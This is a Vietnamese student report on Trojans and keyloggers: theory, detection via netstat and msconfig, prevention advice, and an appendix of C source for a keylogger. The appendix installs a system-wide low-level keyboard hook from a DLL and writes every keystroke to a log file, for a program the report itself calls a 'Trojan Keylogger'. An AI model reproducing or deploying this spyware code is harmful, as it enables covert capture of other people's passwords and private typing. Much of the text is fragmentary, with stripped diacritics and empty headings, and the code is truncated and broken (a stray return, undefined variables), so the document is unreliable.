Nng 2012
MC LC
MC LC....................................................................................................................2
Chng 1. C S L THUYT.................................................................................3
1.1 Gii thiu................................................................................................................3
1.2 Tm hiu v Trojan.................................................................................................5
1.2.1 Cc dng Trojans c bn:.................................................................................5
1.2.2 Mc ch ca nhng k vit ra nhng Trojans:.................................................5
1.2.3 Nhng con ng my tnh nn nhn nhim Trojan:...................................6
1.2.4 Nhng cch nhn bit mt my tnh b nhim Trojan:......................................6
1.3 Gii thiu v KeyLogger........................................................................................7
1.3.1 KeyLogger l g?..............................................................................................7
1.3.2 Phn loi KeyLogger:.......................................................................................7
1.3.3 Cch hot ng ca KeyLogger:.......................................................................8
1.4 Cch pht hin v phng chng..............................................................................9
1.4.1 Cch pht hin Trojan:......................................................................................9
1.4.2 Cch phng chng:.........................................................................................13
Chng 2. PHN TCH V THIT K CHNG TRNH....................................14
2.1 M t bi ton.......................................................................................................14
2.2 Phn tch yu cu..................................................................................................14
2.2.1 Yu cu v chc nng:....................................................................................14
2.2.2 Yu cu v giao din ngi dng:..................................................................14
2.2.3 Yu cu v tng thch:..................................................................................14
2.3 Phn tch chc nng..............................................................................................14
2.4 K thut Hook.......................................................................................................14
2.4.1 Gii thiu:.......................................................................................................14
2.4.2 Chui Hook:...................................................................................................15
2.4.3 Th tc Hook:.................................................................................................15
2.4.4 Cch s dng Hook:.......................................................................................16
2.5 Thut ton.............................................................................................................17
2.5.1 Hm WriteStringToFile(char *txt):................................................................17
2.5.2 Hm LogKeyboard:........................................................................................17
Chng 3. TRIN KHAI NH GI KT QU....................................................18
3.1 Mi trng trin khai............................................................................................18
3.2 Kt qu chc nng chng trnh...........................................................................18
3.3 u v nhc im.................................................................................................20
3.3.1 u im:.........................................................................................................20
3.3.2 Nhc im:...................................................................................................20
3.4 Hng pht trin...................................................................................................20
TI LIU THAM KHO..........................................................................................21
PH LC...................................................................................................................22
Chng 1.
1.1
CƠ SỞ LÝ THUYẾT
Giới thiệu
Một Trojan là một chương trình nhỏ chạy ở chế độ ẩn và gây hại cho máy tính.
Với sự trợ giúp của Trojan, một kẻ tấn công có thể dễ dàng truy cập vào máy tính nạn nhân.
Tìm hiểu về Trojan
Kẻ tấn công có thể truy cập được vào các máy tính bị nhiễm Trojans khi
1.2.1
* Remote Access Trojans – cho kẻ tấn công kiểm soát toàn bộ hệ thống từ xa.
* Data-Sending Trojans – gửi những thông tin nhạy cảm cho kẻ tấn công.
* Destructive Trojans – phá hủy hệ thống.
* Denial-of-Service (DoS) Attack Trojans – Trojans dùng để tấn công DoS.
* Proxy Trojans – biến máy nạn nhân thành proxy trung gian cho kẻ tấn công.
* HTTP, FTP Trojans – Trojan tự tạo thành HTTP hay FTP server để kẻ tấn
công khai thác lại.
* Security Software Disable Trojans – vô hiệu hóa phần mềm bảo mật trên máy nạn nhân.
1.2.2
1.2.3
* CD-ROM tự động mở ra đóng vào.
* Máy tính có những dấu hiệu lạ trên màn hình.
* Hình nền của các cửa sổ Windows bị thay đổi.
* Các văn bản tự động in.
* Máy tính tự động thay đổi font chữ và các thiết lập khác.
* Hình nền máy tính tự động thay đổi và không thể đổi lại.
* Chuột trái, chuột phải lẫn lộn.
* Chuột không hiển thị trên màn hình.
* Nút Start không hiển thị.
Lưu ý: các dấu hiệu trên chỉ đặc trưng cho những Trojan "phá phách" đời cũ; Trojan hiện đại (đặc biệt là keylogger) được thiết kế để không gây ra bất kỳ dấu hiệu nào cho người dùng, nên không thấy dấu hiệu không có nghĩa là máy sạch.
1.3
KeyLogger là gì?
Keylogger hay "trình theo dõi thao tác bàn phím" theo cách dịch ra tiếng
Việt là một chương trình máy tính ban đầu được viết nhằm mục đích theo dõi và ghi
lại mọi thao tác thực hiện trên bàn phím vào một tập tin nhật ký (log) cho người cài
đặt nó sử dụng. Vì chức năng mang tính vi phạm vào riêng tư của người khác này nên
các trình keylogger được xếp vào nhóm các phần mềm gián điệp.
Về sau, khi keylogger phát triển cao hơn nó không những ghi lại thao tác bàn
phím mà còn ghi lại cả các hình ảnh hiển thị trên màn hình (screen) bằng cách chụp
(screen-shot) hoặc quay phim (screen-capture), thậm chí còn ghi nhận cả cách con
trỏ chuột trên máy tính di chuyển.
1.3.2
Keylogger bao gồm hai loại, một loại keylogger phần cứng và một loại là phần
mềm.
Khó tháo gỡ?
Có khả năng lây nhiễm, chống tắt (kill process)?
Cứ mỗi câu trả lời "có", cho một điểm. Điểm càng cao, keylogger càng vượt
khỏi mục đích giám sát (monitoring) đến với mục đích do thám (spying) và tính nguy
hiểm của nó càng cao. Keylogger có thể được phân loại theo số điểm:
Loại số 1
Không điểm: keylogger loại bình thường; chạy công khai, có thông báo cho
người bị theo dõi, đúng với mục đích giám sát.
Loi s 2
Loi s 3
Loi s 4
1.3.3.1
Tập tin hook, hoặc là một chương trình monitor dùng để ghi nhận lại các thao
tác bàn phím, capture screen (đây là phần quan trọng nhất).
Tập tin nhật ký (log), nơi chứa đựng/ghi lại toàn bộ những gì hook ghi nhận
được.
Ngoài ra, tùy theo loại có thể có thêm phần chương trình bảo vệ (guard,
protect), chương trình thông báo (report).
1.3.3.2
Cách thức cài đặt vào máy
Cách hoạt động
- Dùng câu lệnh Netstat -an trong Windows để biết hệ thống đang lắng nghe
trên các port nào.
+ Hình dưới ta thấy có port 7777, đây là port của Tini Trojan.
+ Ta thấy port 8800 đang chờ nghe và có máy đang kết nối đến, có thể
là của Trojans.
Lưu ý: một cổng lạ chỉ là dấu hiệu nghi ngờ, chưa phải bằng chứng. Nên dùng netstat -ano để lấy thêm PID của tiến trình mở cổng, rồi đối chiếu với tasklist (hoặc Task Manager) để xác định đúng tiến trình trước khi kết luận.
1.4.1.2
1.4.1.3
- Trong Startup
- Trong Registry: đa số sẽ nằm tại đây. Chúng ta sử dụng câu lệnh Msconfig,
trong tab Startup, chương trình nào muốn chạy tự động sẽ phải nằm tại đây.
Trong ví dụ này có file nc.exe chạy lúc khởi động và vị trí của nó là tại folder
c:\vnexperts.net
Lưu ý: Msconfig chỉ hiển thị một phần các vị trí tự khởi động (các khóa Run và thư mục Startup); dịch vụ (service), tác vụ theo lịch (scheduled task) và các vị trí khác cần được kiểm tra riêng, ví dụ bằng công cụ Autoruns của Sysinternals.
1.4.2
- Không sử dụng các phần mềm không tin tưởng (đôi khi tin tưởng vẫn bị dính
Trojans); chỉ tải phần mềm từ nguồn chính thức của nhà phát hành.
- Không vào các trang web nguy hiểm, không cho phép cài ActiveX hay chạy script
từ các trang web không tin cậy bởi có thể sẽ đính kèm Trojans.
- Tối quan trọng là phải update OS thường xuyên.
- Cài phần mềm diệt virus uy tín như: Kaspersky Internet Security, Norton
Internet Security, và McAfee Total Security. Sau khi cài các phần mềm này bạn hãy
update nó thường xuyên.
Chng 2.
2.1
Mô tả bài toán
Xây dựng một chương trình Trojan Keylogger có khả năng ghi lại các thao tác
Phn tch yu cu
2.2.1
Yu cu v chc nng:
Yu cu v tng thch:
2.4
K thut Hook
2.4.1
Giới thiệu:
hook những thông điệp thật cần thiết và kết thúc việc hook ngay khi không dùng đến
nữa.
Các mô hình Hook:
- Local hook: là kỹ thuật Hook dùng để bẫy sự kiện ngay trong tiến trình cài
đặt.
- Remote hook: là kỹ thuật Hook cho phép bẫy các sự kiện thuộc tiến trình của
ứng dụng khác. Trong mô hình này lại tồn tại hai kiểu hook khác:
+ Thread-specific: kiểu Hook này sẽ bẫy sự kiện của một luồng cụ thể.
+ System-wide: bẫy sự kiện của tất cả các luồng trong tất cả các tiến
trình đang thi hành trong hệ thống.
Lưu ý: các hook mức thấp như WH_KEYBOARD_LL (loại được dùng trong chương trình ở Phụ lục) là trường hợp đặc biệt: thủ tục hook được gọi trong ngữ cảnh của luồng đã cài đặt hook, và DLL không được nạp vào các tiến trình khác như mô hình remote hook thông thường.
Thnh phn ca Hook:
Chui Hook
Th tc Hook
Cc kiu Hook
2.4.2
Chui Hook:
Th tc Hook:
tiến trình khác. Vì vậy, không có cách nào giải phóng DLL. Hệ thống chỉ có thể
giải phóng DLL khi tất cả các tiến trình liên kết tới DLL đã kết thúc hoặc gọi
FreeLibrary.
Giải pháp đặt ra cho vấn đề này là xây dựng hàm cài đặt ngay trong thư viện
DLL. Bằng việc liên kết tới DLL, ứng dụng có thể cài đặt hook. Và ngay trong DLL
cũng phải có hàm giải phóng hook (gọi UnhookWindowsHookEx) để giải phóng khi không cần đến nữa.
2.5
Thut ton
2.5.1
Hm WriteStringToFile(char *txt):
Hm LogKeyboard:
Chng 3.
3.1
TRIN KHAI NH GI KT QU
3.2
3.3
Ưu và nhược điểm
Sau khi triển khai chạy thử ứng dụng, nhóm chúng em rút ra các nhận xét đánh
giá sau:
3.3.1
Ưu điểm:
Nhược điểm:
- Website wikipedia.org
- Software Requirement Specification Template IEEE
- An Analysis of the System
Salman A. Baset and Henning Schulzrinne
Department of Computer Science
Columbia University, New York NY 10027
{salman,hgs}@cs.columbia.edu
September 15, 2004
PHỤ LỤC
Tập tin thi hành Jaam.exe
#include "stdafx.h"
#include <windows.h>
/* Window procedure prototype. No definition of it appears in this listing,
   and the visible WinMain never registers a window class or refers to it. */
LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM);
/* Window class name kept as a global. Not referenced by the visible WinMain. */
char szClassName[ ] = "WindowsApp";
/* Module handle of the hook DLL ("Hooker"), filled in by LoadLibrary in WinMain. */
HINSTANCE hinstDLL;
/* Handle returned by SetWindowsHookEx in WinMain. Nothing in this listing
   passes it to UnhookWindowsHookEx, so the hook is never explicitly removed. */
HHOOK hHook = NULL;
/* Signature expected for the DLL's "SetGlobalHook" export, looked up with
   GetProcAddress in WinMain. It receives the hook handle; presumably the DLL
   keeps a copy (see hGlobalHook in the DLL source) — the export's body is not
   in this listing, so confirm against Hooker.dll. */
typedef VOID (*LOADPROC)(HHOOK hHook);
/*
 * Entry point of Jaam.exe: loads Hooker.dll, installs its LogKeyboard export as
 * a global low-level keyboard hook, and hands the hook handle back to the DLL.
 *
 * NOTE(review): this is an educational keylogger; run it only on a machine you
 * own or have explicit written consent to test, in an isolated lab.
 *
 * NOTE(review): the listing as transcribed is incomplete — see the comment on
 * the stray `return 0;` after the closing brace below.
 */
int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil)
{
/* The DLL is loaded by bare name, with no path and no ".dll" suffix, so it is
   resolved through the normal DLL search order. Anything that can drop a
   file named Hooker.dll earlier in that search order gets its code loaded
   here (classic DLL search-order hijacking). A full path would avoid that. */
hinstDLL = LoadLibrary(TEXT("Hooker"));
/* L"..." literals only match MessageBox when UNICODE is defined (MessageBoxW);
   an ANSI build would fail to compile these three calls. TEXT() above adapts
   either way, so the listing presumably comes from a UNICODE project. */
if (hinstDLL == NULL) { MessageBox(0,L"Not found.",L"Error",0); return 0; }
/* Resolve the hook procedure by undecorated name. The DLL listing shows no
   __declspec(dllexport) / extern "C" on LogKeyboard, so the export presumably
   comes from a .def file or build setting not shown here — TODO confirm. */
HOOKPROC hpr = (HOOKPROC)GetProcAddress(hinstDLL,"LogKeyboard");
if (hpr == NULL) { MessageBox(0,L"Unvail lib.",L"Error",0); return 0; }
/* WH_KEYBOARD_LL with dwThreadId == 0: a system-wide low-level keyboard hook.
   For this hook type the callback runs on the installing thread, which needs
   a message loop to service it; the DLL is not injected into other processes. */
hHook = SetWindowsHookEx(WH_KEYBOARD_LL, hpr, hinstDLL, 0);
if (hHook == NULL) { MessageBox(0,L"Corrupt lib.",L"Error",0); return 0; }
LOADPROC lpr = (LOADPROC)GetProcAddress(hinstDLL,"SetGlobalHook");
/* NOTE(review): unlike the two lookups above, this result is not checked for
   NULL before being called — a missing export crashes here instead of
   producing an error box. */
lpr(hHook);
/* hwnd and messages are declared but no message loop follows in this
   listing; as shown, WinMain returns immediately and the hook handle is
   never released with UnhookWindowsHookEx. The loop was presumably lost in
   transcription — TODO confirm against the original source. */
HWND hwnd;
MSG messages;
}
/* Stray line outside the function body: a transcription artifact of the
   listing (most likely the tail of the missing message loop), not valid C. */
return 0;
Thư viện Hooker.dll
// dllmain.cpp : Defines the entry point for the DLL application.
#include <windows.h>
#include <conio.h>
#include <stdio.h>
#include <ctype.h>
#include <string>
#include <tchar.h>
#include <stdio.h>
#include <psapi.h>
/* Named data section intended to be shared between every process that maps
   this DLL (the classic global-hook pattern). NOTE(review): making a section
   shared normally also needs a linker directive for ".SHARDAT" that is not
   shown in this listing, and MSVC only places *initialized* variables in a
   #pragma data_seg section — `out` below has no initializer, so it probably
   does not land here at all. A writable shared section is also writable by
   any process that loads the DLL, so its contents cannot be trusted. */
#pragma data_seg(".SHARDAT")
/* Copy of the hook handle handed over by the EXE via SetGlobalHook (the
   export's body is not in this listing — TODO confirm). With WH_KEYBOARD_LL
   the DLL is not injected into other processes, so sharing it is unnecessary. */
HHOOK hGlobalHook = NULL;
/* Log file stream. A FILE* is a per-process CRT object; sharing the pointer
   value across processes would be meaningless, so this should not be in a
   shared section. The visible code opens and closes it per write. */
FILE *out;
#pragma data_seg()
/* Declared here; no definition appears in the visible part of the listing. */
int PrintModules( DWORD processID );
/* Appends txt to the log file (body partially visible further down). */
void WriteStringToFile(char *txt);
/* Declared here; no definition appears in the visible part of the listing. */
void WriteEnterToFile();
LRESULT CALLBACK LogKeyboard(int nCode, WPARAM wParam, LPARAM lParam)
{
if (nCode == HC_ACTION && wParam == WM_KEYDOWN)
{
bool isDownShift = ((GetKeyState(VK_SHIFT) & 0x80) == 0x80 ? true : false);
bool isDownCapslock = (GetKeyState(VK_CAPITAL) != 0 ? true : false);
bool isDownCtrl = ((GetKeyState(VK_CONTROL) & 0x80) == 0x80 ? true : false);
byte keyState[256];
GetKeyboardState(keyState);
WORD w;
KBDLLHOOKSTRUCT* keycode = (KBDLLHOOKSTRUCT*)lParam;
if (keycode->vkCode == VK_RETURN) WriteStringToFile("{Enter}");
if (keycode->vkCode == VK_BACK) WriteStringToFile("{Backspace}");
if (keycode->vkCode == VK_DELETE) WriteStringToFile("{Delete}");
if (keycode->vkCode == VK_HOME) WriteStringToFile("{Home}");
if (keycode->vkCode == VK_END) WriteStringToFile("{End}");
if (keycode->vkCode == VK_LEFT) WriteStringToFile("{Left}");
if (keycode->vkCode == VK_RIGHT) WriteStringToFile("{Right}");
if (keycode->vkCode == VK_UP) WriteStringToFile("{Up}");
if (keycode->vkCode == VK_DOWN) WriteStringToFile("{Down}");
else if (ToAscii(keycode->vkCode,
keycode->scanCode,
keyState,
&w,
keycode->flags) == 1)
{
char key = (char)w;
out=fopen(str,"a");
fprintf(out,"%s",txt);
fclose(out);